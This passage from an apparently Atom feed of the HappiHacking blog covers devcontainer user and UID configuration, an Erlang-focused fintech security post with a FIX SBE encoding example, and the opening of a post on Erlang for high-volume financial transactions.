stuff inside the container. (What &lt;code&gt;devcontainer exec&lt;/code&gt; does is basically
just to parse the &lt;code&gt;devcontainer.json&lt;/code&gt; file and then run &lt;code&gt;docker exec -u name-or-UID&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;In most documentation, &lt;code&gt;remoteUser&lt;/code&gt; is the recommended one to set. I have
not yet found a good explanation of when it is preferred to set
`containerUser&#39;.&lt;/p&gt;
&lt;h3 id=&quot;doing-the-right-thing&quot; tabindex=&quot;-1&quot;&gt;Doing the right thing&lt;/h3&gt;
&lt;p&gt;Depending on how the base container is set up, you will need to do
different things in order to make UID updating work, so that the UID inside
the container will be the same as your external user ID:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;If the base container runs as root, but also has an a single non-root
user that you can use (such as &lt;code&gt;ubuntu&lt;/code&gt; or &lt;code&gt;vscode&lt;/code&gt;), you only need to
specify that internal user name or UID with &lt;code&gt;remoteUser&lt;/code&gt; or
&lt;code&gt;containerUser&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If the base container runs as root, and &lt;em&gt;does not have a usable non-root
user&lt;/em&gt;, don&#39;t panic, you just need to create that user when the container
starts. Thankfully someone has already solved this so you do not need to
write any weird scripts yourself.&lt;/p&gt;
&lt;p&gt;Specify the user name with &lt;code&gt;remoteUser&lt;/code&gt; or &lt;code&gt;containerUser&lt;/code&gt; as above,
but also add the following &lt;a href=&quot;https://containers.dev/implementors/features/&quot;&gt;feature
declaration&lt;/a&gt; (see
&lt;a href=&quot;https://github.com/nils-geistmann/devcontainers-features/blob/main/src/create-remote-user/README.md&quot;&gt;https://github.com/nils-geistmann/devcontainers-features/blob/main/src/create-remote-user/README.md&lt;/a&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;features&amp;quot;: {
    &amp;quot;ghcr.io/nils-geistmann/devcontainers-features/create-remote-user:0&amp;quot;: {
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If the base container already has a user with UID 1000, but it cannot be
the devcontainer user for some reason, then adding a new user is not
enough - the external UID will often be 1000, and then the automatic UID
updating will fail because UID 1000 is already in use internally. One
possibility is then to use a wrapper Dockerfile that changes UIDs or
removes users; see
&lt;a href=&quot;https://code.visualstudio.com/remote/advancedcontainers/add-nonroot-user#_change-the-uidgid-of-an-existing-container-user&quot;&gt;https://code.visualstudio.com/remote/advancedcontainers/add-nonroot-user#_change-the-uidgid-of-an-existing-container-user&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If you for some reason want to prevent UID update from happening at all,
it can be disabled by setting &lt;code&gt;&amp;quot;updateRemoteUserUID&amp;quot;: false&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;devcontainer-ready-images&quot; tabindex=&quot;-1&quot;&gt;Devcontainer-ready images&lt;/h3&gt;
&lt;p&gt;A lot of the documentation on dev containers assumes you&#39;re using VSCode,
and often also that you are using a devcontainer-ready image that is
already set up with a suitable non-root user and some dev tools, and not
just some basic Docker image like &lt;code&gt;ubuntu:22.04&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In that case you typically do not need to to set &lt;code&gt;remoteUser&lt;/code&gt;, or use the
&lt;code&gt;create-remote-user&lt;/code&gt; feature. For example, in
&lt;a href=&quot;https://github.com/devcontainers/images&quot;&gt;https://github.com/devcontainers/images&lt;/a&gt;
the images &lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-20.04&lt;/code&gt; and
&lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-22.04&lt;/code&gt; both have a default
user &lt;code&gt;vscode&lt;/code&gt; with UID 1000.(*)&lt;/p&gt;
&lt;p&gt;If you write your own Dockerfile for your devcontainer configuration
instead of referring to some existing image, you should ensure that it is
set up similarly so that it can be expected to work for everyone.&lt;/p&gt;
&lt;p&gt;&lt;small&gt;(*) In Microsoft&#39;s devcontainer images, the &lt;code&gt;USER&lt;/code&gt; setting is actually root,
but the images have additional &lt;code&gt;devcontainer.metadata&lt;/code&gt; which can provide
the same settings as &lt;code&gt;devcontainer.json&lt;/code&gt;, and this contains an entry
&lt;code&gt;&amp;quot;remoteUser&amp;quot;:&amp;quot;vscode&amp;quot;&lt;/code&gt;, so that when started from VSCode or with
&lt;code&gt;devcontainer up&lt;/code&gt;, the user will be &lt;code&gt;vscode&lt;/code&gt;. When started with a plain
Docker command, the metadata is not parsed.&lt;/small&gt;&lt;/p&gt;
&lt;h3 id=&quot;ubuntu-24-hickups&quot; tabindex=&quot;-1&quot;&gt;Ubuntu 24 hickups&lt;/h3&gt;
&lt;p&gt;As of Ubuntu 24 (Noble Numbat), the Ubuntu base image comes with a non-root
user &lt;code&gt;ubuntu&lt;/code&gt; with UID 1000 - though by default the container will run as
root. This means that you need to set &lt;code&gt;remoteUser&lt;/code&gt; to &lt;code&gt;ubuntu&lt;/code&gt;, but you
must not use the &lt;code&gt;create-remote-user&lt;/code&gt; feature (which you needed on Ubuntu
22 and earlier).&lt;/p&gt;
&lt;p&gt;The corresponding devcontainer image from Microsoft
(&lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-24.04&lt;/code&gt;) has the additional
&lt;code&gt;vscode&lt;/code&gt; user as usual, but in the earlier versions of this image it gets
UID 1001. When your external UID is 1000, as it often is, the UID update is
skipped because UID 1000 is in use by the &lt;code&gt;ubuntu&lt;/code&gt; user. This has been
fixed in &lt;code&gt;mcr.microsoft.com/devcontainers/base:1.2.0-ubuntu-24.04&lt;/code&gt; and
later (by deleting the &lt;code&gt;ubuntu&lt;/code&gt; user). If you cannot switch to that
version, you can either explicitly set &lt;code&gt;&amp;quot;remoteUser&amp;quot;: &amp;quot;ubuntu&amp;quot;&lt;/code&gt;, or you can
wrap the image in a Dockerfile that does &lt;code&gt;RUN userdel -r ubuntu&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&quot;emacs&quot; tabindex=&quot;-1&quot;&gt;Emacs&lt;/h3&gt;
&lt;p&gt;If you&#39;re using &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers-emacs/&quot;&gt;Emacs with
Tramp&lt;/a&gt; to
access the files (after starting the container with &lt;code&gt;devcontainer up --workspace-folder .&lt;/code&gt;), you can open a file in the container by writing the
path as&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;/docker:&amp;lt;container-name-or-ID&amp;gt;:/path/to/file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(e.g. after pressing &lt;code&gt;C-x C-f&lt;/code&gt;). This will however use the container&#39;s
default user, because Emacs does not know about the &lt;code&gt;devcontainer.json&lt;/code&gt;
file. To select a different user you can write&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;/docker:&amp;lt;username-or-ID&amp;gt;@&amp;lt;container-name-or-ID&amp;gt;:/path/to/file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should work by default in Emacs 29 or later.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The way Docker containers map onto different platforms, and how to
configure devcontainers to take this into account, can be a source of much
hair pulling and long sessions of googling. We hope this piece can be of
help.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Enhancing Fintech Security with Erlang</title>
    <link href="https://happihacking.com/blog/posts/2024/security_for_fintech/"/>
    <updated>2024-09-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/security_for_fintech/</id>
    <summary>Build Scalable and Reliable Fintech Systems with Erlang</summary>
    <content type="html">&lt;h1 id=&quot;enhancing-fintech-security-with-erlang-insights-from-happihacking&quot; tabindex=&quot;-1&quot;&gt;Enhancing Fintech Security with Erlang: Insights from HappiHacking&lt;/h1&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;Erlang for Fintech Systems.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Erlang for Fintech Systems.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;As the former CTO of Klarna and the founder of &lt;strong&gt;HappiHacking&lt;/strong&gt; and &lt;strong&gt;Kindio&lt;/strong&gt;,
I&#39;ve spent years at the intersection of financial systems and security.
The growth of digital transactions has made fintech platforms a prime target for cyber threats.
I&#39;ve found that leveraging Erlang&#39;s unique capabilities significantly enhances the security,
scalability, and reliability of financial applications.&lt;/p&gt;
&lt;p&gt;In this post, I&#39;ll share insights into the unique security challenges faced by fintech
companies and how Erlang can be utilized to address these challenges effectively.&lt;/p&gt;
&lt;h2 id=&quot;the-unique-security-challenges-in-fintech&quot; tabindex=&quot;-1&quot;&gt;The Unique Security Challenges in Fintech&lt;/h2&gt;
&lt;p&gt;Fintech platforms handle sensitive personal and financial data daily.
This makes them lucrative targets for cybercriminals employing tactics like
phishing, malware, and distributed denial-of-service (DDoS) attacks.
New vulnerabilities are constantly emerging, and integrating modern
applications with legacy systems often adds layers of complexity.&lt;/p&gt;
&lt;p&gt;Ensuring security requires robust technological solutions and a deep understanding of
regulatory compliance. Regulations like &lt;strong&gt;GDPR&lt;/strong&gt;, &lt;strong&gt;PSD2&lt;/strong&gt;, &lt;strong&gt;PCI DSS&lt;/strong&gt;, and standards
like &lt;strong&gt;ISO/IEC 27001&lt;/strong&gt; mandate strict guidelines for data protection and transaction security.
Non-compliance can result in severe penalties and loss of customer trust.&lt;/p&gt;
&lt;h2 id=&quot;building-security-from-the-ground-up-with-erlang&quot; tabindex=&quot;-1&quot;&gt;Building Security from the Ground Up with Erlang&lt;/h2&gt;
&lt;p&gt;Erlang&#39;s architecture provides a robust foundation for developing secure fintech applications, and at &lt;strong&gt;HappiHacking&lt;/strong&gt;, we have fully leveraged its capabilities to create systems that are both secure and high-performing. One of the key strengths of Erlang is its support for concurrency and process isolation. Erlang’s lightweight processes operate independently and communicate through message passing, ensuring that failures or data leaks are contained, minimizing the risk of cascading issues across the system.&lt;/p&gt;
&lt;p&gt;Additionally, Erlang&#39;s focus on immutable data structures aligns well with the functional programming paradigm, reducing the complexity involved in managing concurrent operations and eliminating the risk of accidental data modifications. This characteristic enhances both system reliability and security.&lt;/p&gt;
&lt;p&gt;Another critical feature of Erlang is its built-in fault tolerance, achieved through the use of supervision trees. These trees monitor system processes and automatically detect and restart failed processes, ensuring high availability and resilience-both of which are crucial for financial applications that demand uninterrupted uptime.&lt;/p&gt;
&lt;h2 id=&quot;best-practices-for-securing-fintech-applications&quot; tabindex=&quot;-1&quot;&gt;Best Practices for Securing Fintech Applications&lt;/h2&gt;
&lt;p&gt;Building on Erlang&#39;s strengths, here are some best practices we&#39;ve implemented in our projects:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Encrypt All Data&lt;/strong&gt;: Utilize strong encryption algorithms for data at rest and in transit. Erlang&#39;s &lt;code&gt;ssl&lt;/code&gt; module facilitates the implementation of secure communication channels.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Implement Multi-Factor Authentication (MFA)&lt;/strong&gt;: Enhance user authentication by combining something the user knows (password) with something they have (token) or something they are (biometric verification).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Regular Security Audits&lt;/strong&gt;: Conduct periodic security assessments and penetration testing.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Secure Coding Practices&lt;/strong&gt;: Emphasize code reviews, input validation, and adherence to secure coding standards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Incident Response Planning&lt;/strong&gt;: Develop a comprehensive incident response plan.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Compliance Monitoring&lt;/strong&gt;: Use automated tools to ensure ongoing compliance with relevant regulations and standards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tokenization&lt;/strong&gt;: Replace sensitive data with tokens. In our applications, we&#39;ve implemented tokenization using UUIDs to minimize the exposure of sensitive information.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;API Security&lt;/strong&gt;: Secure APIs using OAuth 2.0, JWTs, and implement rate limiting. Erlang&#39;s capabilities make it efficient to handle secure API requests at scale.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DevSecOps&lt;/strong&gt;: Integrate security into the development lifecycle. We incorporate security checks into our CI/CD pipelines to catch issues early.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Blockchain Technologies&lt;/strong&gt;: Leverage techniques from the blockchain world, such as immutable records and transparent transactions. We&#39;ve explored using Erlang to implement blockchain features like Merkle trees for data verification.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Property-Based Testing&lt;/strong&gt;: is a powerful tool we utilize to ensure that our systems behave correctly under a wide range of scenarios. This testing method generates a variety of inputs and checks system properties to ensure correctness and robustness.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;leveraging-erlang-for-fintech-security&quot; tabindex=&quot;-1&quot;&gt;Leveraging Erlang for Fintech Security&lt;/h2&gt;
&lt;h3 id=&quot;secure-api-development&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Secure API Development&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang&#39;s process isolation is ideal for developing secure APIs. Each process handles individual requests, ensuring that if one process is compromised or crashes, others remain unaffected.&lt;/p&gt;
&lt;h3 id=&quot;real-time-fraud-detection&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Real-Time Fraud Detection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang excels at handling concurrent processes, making it perfect for real-time fraud detection systems. By spawning a separate analyzis process for each transaction, we can analyze patterns in parallel to the exection of the transaction.
This leads to lover latencies for transactions.&lt;/p&gt;
&lt;h3 id=&quot;implementing-protocols-with-binary-pattern-matching&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Implementing Protocols with Binary Pattern Matching&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang&#39;s binary pattern matching simplifies implementing complex protocols like FIX SBE.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(fix_sbe).
-export([encode_order/1, decode_order/1]).

-record(order, {
    order_id,
    price,
    quantity,
    side,
    symbol
}).

encode_order(Order) -&amp;gt;
    SymbolPadded = pad_symbol(Order#order.symbol, 6),
    Body = &amp;lt;&amp;lt;
        Order#order.order_id:64/big-unsigned,
        Order#order.price:64/float,
        Order#order.quantity:32/big-unsigned,
        Order#order.side:8/unsigned,
        SymbolPadded/binary
    &amp;gt;&amp;gt;,
    MsgLength = byte_size(Body) + 4,
    &amp;lt;&amp;lt;
        MsgLength:16/big-unsigned,
        1:16/big-unsigned, % Template ID for Order
        Body/binary
    &amp;gt;&amp;gt;.

decode_order(Binary) -&amp;gt;
    &amp;lt;&amp;lt;MsgLength:16/big-unsigned, TemplateID:16/big-unsigned, Rest/binary&amp;gt;&amp;gt; = Binary,
    case TemplateID of
        1 -&amp;gt;
            decode_order_body(Rest);
        _ -&amp;gt;
            {error, unknown_template}
    end.

decode_order_body(&amp;lt;&amp;lt;OrderID:64/big-unsigned, Price:64/float, Quantity:32/big-unsigned, Side:8/unsigned, Symbol:6/binary&amp;gt;&amp;gt;) -&amp;gt;
    SymbolTrimmed = binary:trim(Symbol, trailing, $ ),
    {ok, #order{order_id = OrderID, price = Price, quantity = Quantity, side = Side, symbol = SymbolTrimmed}}.

pad_symbol(Symbol, Length) -&amp;gt;
    SymbolLength = byte_size(Symbol),
    PaddingSize = Length - SymbolLength,
    Padding = &amp;lt;&amp;lt; &amp;quot; &amp;quot; || _ &amp;lt;- lists:seq(1, PaddingSize) &amp;gt;&amp;gt;,
    &amp;lt;&amp;lt; Symbol/binary, Padding/binary &amp;gt;&amp;gt;.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code demonstrates how binary pattern matching efficiently, and more importantly
in a very readable way, handles complex binary protocols.&lt;/p&gt;
&lt;h2 id=&quot;real-world-examples-of-erlang-in-action&quot; tabindex=&quot;-1&quot;&gt;Real-World Examples of Erlang in Action&lt;/h2&gt;
&lt;p&gt;At HappiHacking, we’ve collaborated with numerous companies to implement Erlang for secure and high-performance systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;WhatsApp&lt;/strong&gt; uses Erlang to maintain secure messaging for millions, leveraging its process isolation and concurrency to ensure fast and reliable communication.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Aeternity&lt;/strong&gt; utilizes Erlang for blockchain compliance, employing its features to handle secure transactions and uphold data integrity in regulated environments.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Kindio&lt;/strong&gt; relies on Erlang&#39;s fault tolerance and concurrency to manage Euro and SEK transactions securely in real-time across the European financial market.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Klarna&lt;/strong&gt; processes millions of payments daily with Erlang, which provides the reliability and real-time capabilities needed for secure global transactions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Delta Exchange&lt;/strong&gt; deploys Erlang for high-frequency trading, utilizing its concurrency model to execute trades efficiently and securely.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deutsche Telekom&lt;/strong&gt; partnered with HappiHacking to develop a GDPR-compliant data pipeline that processes 1 billion events daily, focusing on large-scale system architecture and data security.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Erlang’s versatility extends beyond these examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Vocalink (Mastercard)&lt;/strong&gt; employs Erlang for robust financial switches powering national payment systems.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Goldman Sachs&lt;/strong&gt; integrates Erlang in its hedge fund trading platforms to achieve microsecond-level latency for market data processing and trading.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nintendo&lt;/strong&gt; uses Erlang for its Switch console’s messaging, managing millions of concurrent connections, while &lt;strong&gt;Riot Games&lt;/strong&gt; relies on Erlang to support real-time communication for millions of players.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;AdRoll&lt;/strong&gt; processes half a million real-time bid requests per second using Erlang, optimizing ad placements with millisecond precision.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Security in fintech is non-negotiable. By leveraging Erlang&#39;s strengths, fintech companies can build systems that are not only secure but also scalable and resilient. At &lt;strong&gt;HappiHacking&lt;/strong&gt;, we&#39;ve harnessed Erlang to deliver solutions that meet the rigorous demands of the financial industry.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;explore-more-with-happihacking&quot; tabindex=&quot;-1&quot;&gt;Explore More with HappiHacking&lt;/h2&gt;
&lt;p&gt;For tailored support in building secure, reliable fintech systems, contact &lt;strong&gt;HappiHacking&lt;/strong&gt; at &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Reach out to &lt;a href=&quot;mailto:hello@kindio.se&quot;&gt;Kindio&lt;/a&gt; for secure, real-time management of Euro and SEK transactions.&lt;/p&gt;
&lt;p&gt;Check out these resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;&lt;/strong&gt;: A comprehensive guide to the Erlang VM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrency: The Erlang Way&lt;/a&gt;&lt;/strong&gt;: Insights into building concurrent applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/neural_networks_elixir/&quot;&gt;Neural Networks in Elixir&lt;/a&gt;&lt;/strong&gt;: Exploring AI capabilities with Erlang and Elixir.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta: Designing Financial Systems for Performance&lt;/a&gt;&lt;/strong&gt;: Strategies for optimizing financial systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://aeternity.com/&quot;&gt;Aeternity Blockchain&lt;/a&gt;&lt;/strong&gt;: Leveraging Erlang in blockchain technology.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;About HappiHacking&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;HappiHacking&lt;/strong&gt;, we specialize in developing high-performance, secure applications using Erlang and Elixir. With a focus on the financial industry, we bring expertise in building scalable systems that meet stringent security and compliance requirements.&lt;/p&gt;
&lt;p&gt;Visit our website: &lt;a href=&quot;https://happihacking.com/&quot;&gt;happihacking.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Contact us: &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>How Erlang Powers High-Volume Finance</title>
    <link href="https://happihacking.com/blog/posts/2024/erlang_for_fintech/"/>
    <updated>2024-09-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/erlang_for_fintech/</id>
    <summary>Build Scalable and Reliable Fintech Systems with Erlang</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/sunset_riddarfjarden.jpg&quot; alt=&quot;Erlang for Fintech Systems.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Erlang for Fintech Systems.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Handling high-volume transactions efficiently is a must in fintech. Fintech companies need systems that scale easily, maintain low latency, and remain reliable under heavy loads.&lt;/p&gt;
&lt;p&gt;Erlang, initially created for the telecommunications industry, is ideal for fintech. Its features, such as lightweight concurrency, fault tolerance, and native support for distributed computing, make it effective for handling high transaction volumes with minimal latency and high reliability.&lt;/p&gt;
&lt;h2 id=&quot;the-challenge&quot; tabindex=&quot;-1&quot;&gt;The Challenge&lt;/h2&gt;
&lt;p&gt;High-volume transactions create unique challenges for fintech systems. Every payment, trade, or cross-border transaction must be processed rapidly and accurately. With thousands or even millions of transactions per second, these systems require low latency, high availability, and strong fault tolerance.&lt;/p&gt;
&lt;p&gt;To meet these demands, fintech systems must navigate several hurdles. Achieving high performance and low latency is crucial to avoid delays that can disrupt transactions. Security and data privacy are paramount, especially with growing concerns over cyber threats and regulatory requirements. Rapid changes in the market necessitate systems that are adaptable and resilient, able to recover quickly from failures. Integration with both internal and external systems, including legacy infrastructure, adds another layer of complexity. Fintech companies must also comply with a range of regulations while mitigating cybersecurity risks, making the choice of technology even more critical.&lt;/p&gt;
&lt;p&gt;When choosing a programming language, there is often a trade-off: lower-level languages may offer better performance but result in more complex solutions, while higher-level languages can simplify development but may struggle with performance. Erlang provides a compelling alternative by using a process-oriented programming model that simplifies concurrent programming, making it both easier and more efficient for handling high transaction volumes.&lt;/p&gt;
&lt;h2 id=&quot;why-erlang&quot; tabindex=&quot;-1&quot;&gt;Why Erlang?&lt;/h2&gt;
&lt;p&gt;Erlang stands out for its ability to handle high concurrency, distributed computing, and fault tolerance.&lt;/p&gt;
&lt;p&gt;Erlang was built with concurrency in mind. It allows developers to create lightweight processes that run independently and communicate through asynchronous message passing. Unlike traditional threads in other languages, Erlang processes are highly efficient, consuming minimal memory and resources. This allows systems built with Erlang to handle millions of simultaneous transactions without slowing down or crashing, making it ideal for high-frequency trading, payment processing, and other high-volume tasks.&lt;/p&gt;
&lt;p&gt;Erlang systems often follow the “let it crash” philosophy, where processes are designed to fail fast and recover quickly. Erlang’s built-in supervision trees automatically detect and restart failed processes without affecting the rest of the system. This architecture ensures that the system remains operational even under heavy loads or unexpected errors.&lt;/p&gt;
&lt;p&gt;Erlang was designed to run distributed applications across multiple nodes, making it perfect for fintech environments that need to scale across servers and data centers. It natively supports building distributed systems, allowing seamless communication between nodes and enabling redundancy and load balancing. This feature helps fintech companies manage high transaction volumes while ensuring data consistency and fault tolerance across all systems.&lt;/p&gt;
&lt;p&gt;One of Erlang’s most unique features is its ability to perform live code updates without requiring system downtime. This capability allows developers to deploy new features, security patches, and bug fixes without interrupting service. This is especially valuable for companies that operate around the clock and cannot afford downtime.&lt;/p&gt;
&lt;p&gt;Erlang’s design minimizes the time it takes to execute transactions and respond to events. Its virtual machine, BEAM, is optimized for low-latency operations, ensuring that messages between processes are handled with minimal delay. This real-time performance is essential for applications where even microsecond delays, such as trading platforms and payment gateways, can impact transaction outcomes.&lt;/p&gt;
&lt;h2 id=&quot;erlang-in-the-real-world&quot; tabindex=&quot;-1&quot;&gt;Erlang in the real world&lt;/h2&gt;
&lt;p&gt;To understand how Erlang&#39;s unique capabilities translate into real-world benefits, let&#39;s look at some case studies and examples from companies that have successfully leveraged Erlang to handle high transaction volumes.&lt;/p&gt;
&lt;h3 id=&quot;klarna-scalable-payment-processing&quot; tabindex=&quot;-1&quot;&gt;Klarna - Scalable Payment Processing&lt;/h3&gt;
&lt;p&gt;Klarna, a leading payment provider, uses Erlang to manage its payment infrastructure. Klarna processes millions of transactions daily, requiring a robust and scalable system that can handle spikes in traffic without compromising performance. Using Erlang, Klarna can manage concurrent payment requests efficiently, reducing latency and ensuring high availability. Erlang’s fault-tolerant architecture allows Klarna to maintain seamless service even during unexpected outages, minimizing downtime and ensuring customer reliability.&lt;/p&gt;
&lt;h3 id=&quot;telecommunications-a-proven-model-for-scalability-and-reliability&quot; tabindex=&quot;-1&quot;&gt;Telecommunications - A Proven Model for Scalability and Reliability&lt;/h3&gt;
&lt;p&gt;Although not initially a fintech example, the use of Erlang in the telecommunications industry provides a strong parallel. Telecom networks must manage millions of concurrent connections with high uptime requirements-similar to what’s needed in fintech for real-time trading or large-scale payment processing. Ericsson initially created Erlang to handle these exact challenges, and its adoption across telecom giants demonstrates its ability to maintain performance under heavy loads.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;China Telecom (via EMQx):&lt;/strong&gt; Relies on Erlang for its EMQx MQTT broker, which supports massive-scale IoT applications and real-time messaging systems. Erlang enables the system to handle millions of messages per second with low latency and high fault tolerance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Telia:&lt;/strong&gt; Uses Erlang as a core component in its Telia ACE contact center solution, particularly for its &amp;quot;Call Guide&amp;quot; (also known as ACE) system. Telia ACE leverages Erlang to efficiently manage customer interactions across various channels, including voice, chat, and social media, ensuring high availability and responsiveness.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cisco:&lt;/strong&gt; Utilizes Erlang for its NETCONF (Network Configuration Protocol) implementation. NETCONF is a protocol used for network device configuration, and Erlang’s concurrency model allows Cisco to manage multiple configuration sessions simultaneously with high reliability. According to Cisco, 90% of all Internet traffic goes through Erlang-controlled nodes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;whatsapp-messaging-at-scale&quot; tabindex=&quot;-1&quot;&gt;WhatsApp - Messaging at Scale&lt;/h3&gt;
&lt;p&gt;WhatsApp, one of the most popular messaging platforms globally, uses Erlang to manage its massive user base. Although WhatsApp isn’t a fintech company, the scale at which it operates is comparable. Handling billions of messages daily, WhatsApp relies on Erlang’s concurrency model to deliver messages in real-time without delays.&lt;/p&gt;
&lt;h3 id=&quot;kindio-real-time-euro-and-sek-transactions&quot; tabindex=&quot;-1&quot;&gt;Kindio - Real-Time Euro and SEK Transactions&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://www.kindio.se/&quot;&gt;Kindio&lt;/a&gt;, a fintech company specializing in real-time Euro and SEK transactions, leverages Erlang to ensure its settlement systems remain responsive and efficient under heavy load. Using Erlang, Kindio can manage complex transaction flows and ensure compliance with European payment regulations while maintaining optimal performance. Kindio’s use of Erlang enables it to offer instant transactions with minimal latency, providing a reliable and scalable solution.&lt;/p&gt;
&lt;h2 id=&quot;architectural-considerations-when-building-with-erlang&quot; tabindex=&quot;-1&quot;&gt;Architectural considerations when building with Erlang&lt;/h2&gt;
&lt;p&gt;Erlang provides a middle ground between the complexity of microservices and the limitations of monolithic architectures. While microservices can bring about challenges such as increased operational complexity, communication overhead, and inefficient distributed data management, monoliths often face slow development speed, scalability issues, and complicated deployments. Erlang tackles these issues by allowing for a modular monolithic architecture with a &amp;quot;share-nothing&amp;quot; data model.&lt;/p&gt;
